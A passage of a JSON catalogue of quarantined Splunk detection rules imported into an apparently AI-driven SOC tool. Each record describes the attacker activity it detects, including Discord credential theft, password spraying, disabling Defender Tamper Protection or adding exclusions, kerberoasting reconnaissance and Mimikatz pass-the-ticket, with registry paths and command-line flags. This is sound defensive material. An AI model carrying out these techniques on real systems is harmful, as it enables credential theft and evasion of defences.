"splunk-security-content-1166360c-d495-45ac-87a6-8948aac1fa07", "type": "detection", "name": "Windows Non Discord App Access Discord LevelDB", "description": "The following analytic detects non-Discord applications accessing the Discord LevelDB database. It leverages Windows Security Event logs, specifically event code 4663, to identify file access attempts to the LevelDB directory by processes other than Discord. This activity is significant as it may indicate attempts to steal Discord credentials or access sensitive user data. If confirmed malicious, this could lead to unauthorized access to user profiles, messages, and other critical information, potentially compromising the security and privacy of the affected users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-non-discord-app-access-discord-leveldb.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1166360c-d495-45ac-87a6-8948aac1fa07", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_non_discord_app_access_discord_leveldb.yml" } }, { "id": "splunk-security-content-116e11a9-63ea-41eb-a66a-6a13bdc7d2c7", "type": "detection", "name": "Azure AD Multi-Source Failed Authentications Spike", "description": "The following analytic detects potential distributed password spraying attacks in an Azure AD environment. It identifies a spike in failed authentication attempts across various user-and-IP combinations from multiple source IPs and countries, using different user agents. This detection leverages Azure AD SignInLogs, focusing on error code 50126 for failed authentications. This activity is significant as it indicates an adversary's attempt to bypass security controls by distributing login attempts. If confirmed malicious, this could lead to unauthorized access, data breaches, privilege escalation, and lateral movement within the organization's infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multi-source-failed-authentications-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "116e11a9-63ea-41eb-a66a-6a13bdc7d2c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multi_source_failed_authentications_spike.yml" } }, { "id": "splunk-security-content-11ebb7c2-46bd-41c9-81e1-d0b4b34583a2", "type": "detection", "name": "O365 Email Transport Rule Changed", "description": "The following analytic identifies when a user with sufficient access to Exchange Online alters the mail flow/transport rule configuration of the organization. Transport rules are a set of rules that can be used by attackers to modify or delete emails based on specific conditions, this activity could indicate an attacker hiding or exfiltrated data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003", "T1564.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-transport-rule-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "11ebb7c2-46bd-41c9-81e1-d0b4b34583a2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_transport_rule_changed.yml" } }, { "id": "splunk-security-content-11ed764f-eb9c-4be7-bdad-2209b9d33ee1", "type": "detection", "name": "Windows Modify Registry Disable RDP", "description": "This analytic is developed to detect suspicious registry modifications that disable Remote Desktop Protocol (RDP) by altering the \"fDenyTSConnections\" key. Changing this key's value to 1 prevents remote connections, which can disrupt remote management and access. Such modifications could indicate an attempt to hinder remote administration or isolate the system from remote intervention, potentially signifying malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-rdp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "11ed764f-eb9c-4be7-bdad-2209b9d33ee1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_rdp.yml" } }, { "id": "splunk-security-content-11f93009-8083-43fd-82a7-821fcbdc8342", "type": "detection", "name": "Windows Set Account Password Policy To Unlimited Via Net", "description": "The following analytic detects the use of net.exe to update user account policies to set passwords as non-expiring. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"/maxpwage:unlimited\" or \"/maxpwage:49710\", which achieve a similar outcome theoretically. This activity is significant as it can indicate an attempt to maintain persistence, escalate privileges, evade defenses, or facilitate lateral movement. If confirmed malicious, this behavior could allow an attacker to maintain long-term access to compromised accounts, potentially leading to further exploitation and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-set-account-password-policy-to-unlimited-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "11f93009-8083-43fd-82a7-821fcbdc8342", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_set_account_password_policy_to_unlimited_via_net.yml" } }, { "id": "splunk-security-content-12094335-88fc-4c3a-b55f-e62dd8c93c23", "type": "detection", "name": "Windows Modify Registry Tamper Protection", "description": "The following analytic detects a suspicious modification to the Windows Defender Tamper Protection registry setting. It leverages data from the Endpoint datamodel, specifically targeting changes where the registry path is set to disable Tamper Protection. This activity is significant because disabling Tamper Protection can allow adversaries to make further undetected changes to Windows Defender settings, potentially leading to reduced security on the system. If confirmed malicious, this could enable attackers to evade detection, persist in the environment, and execute further malicious activities without interference from Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-tamper-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12094335-88fc-4c3a-b55f-e62dd8c93c23", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_tamper_protection.yml" } }, { "id": "splunk-security-content-121b0b11-f8ac-4ed6-a132-3800ca4fc07a", "type": "detection", "name": "Detect AWS Console Login by User from New City", "description": "The following analytic identifies AWS console login events by users from a new city within the last hour. It leverages AWS CloudTrail events and compares them against a lookup file of previously seen user locations. This activity is significant for a SOC as it may indicate unauthorized access or credential compromise, especially if the login originates from an unusual location. If confirmed malicious, this could lead to unauthorized access to AWS resources, data exfiltration, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-user-from-new-city.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "121b0b11-f8ac-4ed6-a132-3800ca4fc07a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_user_from_new_city.yml" } }, { "id": "splunk-security-content-12345678-abcd-1234-ef00-1234567890ab", "type": "detection", "name": "Cisco Isovalent - Shell Execution", "description": "The following analytic detects the execution of a shell inside a container namespace within the Cisco Isovalent environment. It identifies this activity by monitoring process execution logs for the execution of a shell (sh or bash) inside a container namespace. This behavior is significant for a SOC as it could allow an attacker to gain shell access to the container, potentially leading to further compromise of the Kubernetes cluster. If confirmed malicious, this activity could lead to data theft, service disruption, privilege escalation, lateral movement, and further attacks, severely compromising the cluster's security and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12345678-abcd-1234-ef00-1234567890ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___shell_execution.yml" } }, { "id": "splunk-security-content-1234abcd-5678-90ef-1234-56789abcdef0", "type": "detection", "name": "Windows AppX Deployment Package Installation Success", "description": "This analytic detects successful MSIX/AppX package installations on Windows systems by monitoring EventID 854 in the Microsoft-Windows-AppXDeployment-Server/Operational log. This event is generated when an MSIX/AppX package has been successfully installed on a system. While most package installations are legitimate, monitoring these events can help identify unauthorized or suspicious package installations, especially when correlated with other events such as unsigned package installations (EventID 603 with Flags=8388608) or full trust package installations (EventID 400 with HasFullTrust=true).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-appx-deployment-package-installation-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1234abcd-5678-90ef-1234-56789abcdef0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_appx_deployment_package_installation_success.yml" } }, { "id": "splunk-security-content-12491419-1a6f-4af4-afc3-4e2052f0610e", "type": "detection", "name": "Windows SubInAcl Execution", "description": "The following analytic detects the execution of the SubInAcl utility. SubInAcl is a legacy Windows Resource Kit tool from the Windows 2003 era, used to manipulate security descriptors of securable objects. It leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for any process execution involving \"SubInAcl.exe\" binary. This activity can be significant because the utility should be rarely found on modern Windows machines, which mean any execution could potentially be considered suspicious. If confirmed malicious, this could allow an attacker to blind defenses by tampering with EventLog ACLs or modifying the access to a previously denied resource.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-subinacl-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12491419-1a6f-4af4-afc3-4e2052f0610e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_subinacl_execution.yml" } }, { "id": "splunk-security-content-125f96f9-6f34-418b-b868-c4a8d7fb865f", "type": "detection", "name": "Windows NetSupport RMM DLL Loaded By Uncommon Process", "description": "The following analytic detects the loading of specific dynamic-link libraries (DLLs) associated with the NetSupport Remote Manager (RMM) tool by any process on a Windows system.\nModules such as CryptPak.dll, HTCTL32.DLL, IPCTL32.DLL, keyshowhook.dll, pcicapi.DLL, PCICL32.DLL, and TCCTL32.DLL, are integral to NetSupport's functionality.\nThis detection is particularly valuable when these modules are loaded by processes running from unusual directories (e.g., Downloads, ProgramData, or user-specific folders) rather than the legitimate Program Files installation path, or by executables that have been renamed but retain the internal \"client32\" identifier.\nThis helps to identify instances where the legitimate NetSupport tool is being misused by adversaries as a Remote Access Trojan (RAT).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-netsupport-rmm-dll-loaded-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "125f96f9-6f34-418b-b868-c4a8d7fb865f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_netsupport_rmm_dll_loaded_by_uncommon_process.yml" } }, { "id": "splunk-security-content-127c8d08-25ff-11ec-9223-acde48001122", "type": "detection", "name": "Malicious InProcServer32 Modification", "description": "The following analytic detects a process modifying the registry with a known malicious CLSID under InProcServer32. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications within the HKLM or HKCU Software Classes CLSID paths. This activity is significant as it may indicate an attempt to load a malicious DLL, potentially leading to code execution. If confirmed malicious, this could allow an attacker to persist in the environment, execute arbitrary code, or escalate privileges, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-inprocserver32-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "127c8d08-25ff-11ec-9223-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_inprocserver32_modification.yml" } }, { "id": "splunk-security-content-1297fb80-f42a-4b4a-9c8a-88c066237cf6", "type": "detection", "name": "Schtasks scheduling job on remote system", "description": "The following analytic detects the use of 'schtasks.exe' to create a scheduled task on a remote system, indicating potential lateral movement or remote code execution. It leverages process data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line arguments and flags. This activity is significant as it may signify an adversary's attempt to persist or execute code remotely. If confirmed malicious, this could allow attackers to maintain access, execute arbitrary commands, or further infiltrate the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schtasks-scheduling-job-on-remote-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1297fb80-f42a-4b4a-9c8a-88c066237cf6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schtasks_scheduling_job_on_remote_system.yml" } }, { "id": "splunk-security-content-1297fb80-f42a-4b4a-9c8a-88c066437cf6", "type": "detection", "name": "Schtasks used for forcing a reboot", "description": "The following analytic detects the use of 'schtasks.exe' to schedule forced system reboots using the 'shutdown' and '/create' flags. It leverages endpoint process data to identify instances where these specific command-line arguments are used. This activity is significant because it may indicate an adversary attempting to disrupt operations or force a reboot to execute further malicious actions. If confirmed malicious, this could lead to system downtime, potential data loss, and provide an attacker with an opportunity to execute additional payloads or evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schtasks-used-for-forcing-a-reboot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1297fb80-f42a-4b4a-9c8a-88c066437cf6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schtasks_used_for_forcing_a_reboot.yml" } }, { "id": "splunk-security-content-12a23592-e3da-4344-8545-205d3290647c", "type": "detection", "name": "O365 Block User Consent For Risky Apps Disabled", "description": "The following analytic detects when the \"risk-based step-up consent\" security setting in Microsoft 365 is disabled. It monitors Azure Active Directory logs for the \"Update authorization policy\" operation, specifically changes to the \"AllowUserConsentForRiskyApps\" setting. This activity is significant because disabling this feature can expose the organization to OAuth phishing threats, allowing users to grant consent to malicious applications. If confirmed malicious, attackers could gain unauthorized access to user data and sensitive information, leading to data breaches and further compromise within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-block-user-consent-for-risky-apps-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12a23592-e3da-4344-8545-205d3290647c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_block_user_consent_for_risky_apps_disabled.yml" } }, { "id": "splunk-security-content-12bdaa0b-3c59-4489-aae1-bff6d67746ef", "type": "detection", "name": "Windows Modify Registry ProxyServer", "description": "The following analytic detects modifications to the Windows registry key for setting up a proxy server. It leverages data from the Endpoint.Registry datamodel, focusing on changes to the \"Internet Settings\\\\ProxyServer\" registry path. This activity is significant as it can indicate malware or adversaries configuring a proxy to facilitate unauthorized communication with Command and Control (C2) servers. If confirmed malicious, this could allow attackers to establish persistent, covert channels for data exfiltration or further exploitation of the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-proxyserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12bdaa0b-3c59-4489-aae1-bff6d67746ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_proxyserver.yml" } }, { "id": "splunk-security-content-12c80db8-ef62-4456-92df-b23e1b3219f6", "type": "detection", "name": "Windows Enable Win32 ScheduledJob via Registry", "description": "The following analytic detects the creation of a new DWORD value named \"EnableAt\" in the registry path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\". This modification enables the use of the at.exe or wmi Win32_ScheduledJob commands to add scheduled tasks on a Windows endpoint. The detection leverages registry event data from the Endpoint datamodel. This activity is significant because it may indicate that an attacker is enabling the ability to schedule tasks, potentially to execute malicious code at specific times or intervals. If confirmed malicious, this could allow persistent code execution on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-enable-win32-scheduledjob-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12c80db8-ef62-4456-92df-b23e1b3219f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_enable_win32_scheduledjob_via_registry.yml" } }, { "id": "splunk-security-content-13243068-2d38-11ec-8908-acde48001122", "type": "detection", "name": "ServicePrincipalNames Discovery with PowerShell", "description": "The following analytic detects the use of `powershell.exe` to query the domain for Service Principal Names (SPNs) using Script Block Logging EventCode 4104. It identifies the use of the KerberosRequestorSecurityToken class within the script block, which is equivalent to using setspn.exe. This activity is significant as it often precedes kerberoasting or silver ticket attacks, which can lead to credential theft. If confirmed malicious, attackers could leverage this information to escalate privileges or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/serviceprincipalnames-discovery-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13243068-2d38-11ec-8908-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/serviceprincipalnames_discovery_with_powershell.yml" } }, { "id": "splunk-security-content-13395a44-4dd9-11ec-9df7-acde48001122", "type": "detection", "name": "Windows Defender Exclusion Registry Entry", "description": "The following analytic detects modifications to the Windows Defender exclusion registry entries. It leverages endpoint registry data to identify changes in the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\*\". This activity is significant because adversaries often modify these entries to bypass Windows Defender, allowing malicious code to execute without detection. If confirmed malicious, this behavior could enable attackers to evade antivirus defenses, maintain persistence, and execute further malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-exclusion-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13395a44-4dd9-11ec-9df7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_exclusion_registry_entry.yml" } }, { "id": "splunk-security-content-13435b55-afd8-46d4-9045-7d5457f430a5", "type": "detection", "name": "Microsoft Defender Incident Alerts", "description": "The following analytic is to leverage alerts from Microsoft Defender O365 Incidents. This query aggregates and summarizes all alerts from Microsoft Defender O365 Incidents, providing details such as the destination, file name, severity, process command line, ip address, registry key, signature, description, unique id, and timestamps. This detection is not intended to detect new activity from raw data, but leverages Microsoft provided alerts to be correlated with other data as part of risk based alerting. The data contained in the alert is mapped not only to the risk object, but also the threat object. This detection filters out evidence that has a verdict of clean from Microsoft. It dynamically maps the MITRE technique at search time to auto populate the annotation field with the value provided in the alert. It also uses a static mapping to set the risk score based on the severity of the alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-defender-incident-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13435b55-afd8-46d4-9045-7d5457f430a5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/microsoft_defender_incident_alerts.yml" } }, { "id": "splunk-security-content-1347b9e8-2daa-4a6f-be73-b421d3d9e268", "type": "detection", "name": "Azure AD User Enabled And Password Reset", "description": "The following analytic detects an Azure AD user enabling a previously disabled account and resetting its password within 2 minutes. It uses Azure Active Directory events to identify this sequence of actions. This activity is significant because it may indicate an adversary with administrative access attempting to establish a backdoor identity within the Azure AD tenant. If confirmed malicious, this could allow the attacker to maintain persistent access, escalate privileges, and potentially exfiltrate sensitive information from the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-enabled-and-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1347b9e8-2daa-4a6f-be73-b421d3d9e268", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_enabled_and_password_reset.yml" } }, { "id": "splunk-security-content-134da869-e264-4a8f-8d7e-fcd0ec88f301", "type": "detection", "name": "Monitor Web Traffic For Brand Abuse", "description": "The following analytic identifies web requests to domains that closely resemble your monitored brand's domain, indicating potential brand abuse. It leverages data from web traffic sources, such as web proxies or network traffic analysis tools, and cross-references these with known domain permutations generated by the \"ESCU - DNSTwist Domain Names\" search. This activity is significant as it can indicate phishing attempts or other malicious activities targeting your brand. If confirmed malicious, attackers could deceive users, steal credentials, or distribute malware, leading to significant reputational and financial damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/monitor-web-traffic-for-brand-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "134da869-e264-4a8f-8d7e-fcd0ec88f301", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/monitor_web_traffic_for_brand_abuse.yml" } }, { "id": "splunk-security-content-1379d2b8-0f18-11ec-8ca3-acde48001122", "type": "detection", "name": "Auto Admin Logon Registry Entry", "description": "The following analytic detects a suspicious registry modification that enables auto admin logon on a host. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the \"AutoAdminLogon\" value within the \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\" registry path. This activity is significant because it was observed in BlackMatter ransomware attacks to maintain access after a safe mode reboot, facilitating further encryption. If confirmed malicious, this could allow attackers to automatically log in and continue their operations, potentially leading to widespread network encryption and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/auto-admin-logon-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1379d2b8-0f18-11ec-8ca3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/auto_admin_logon_registry_entry.yml" } }, { "id": "splunk-security-content-13bbd574-83ac-11ec-99d4-acde48001122", "type": "detection", "name": "Mimikatz PassTheTicket CommandLine Parameters", "description": "The following analytic detects the use of Mimikatz command line parameters associated with pass-the-ticket attacks. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns related to Kerberos ticket manipulation. This activity is significant because pass-the-ticket attacks allow adversaries to move laterally within an environment using stolen Kerberos tickets, bypassing normal access controls. If confirmed malicious, this could enable attackers to escalate privileges, access sensitive information, and maintain persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mimikatz-passtheticket-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "13bbd574-83ac-11ec-99d4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": 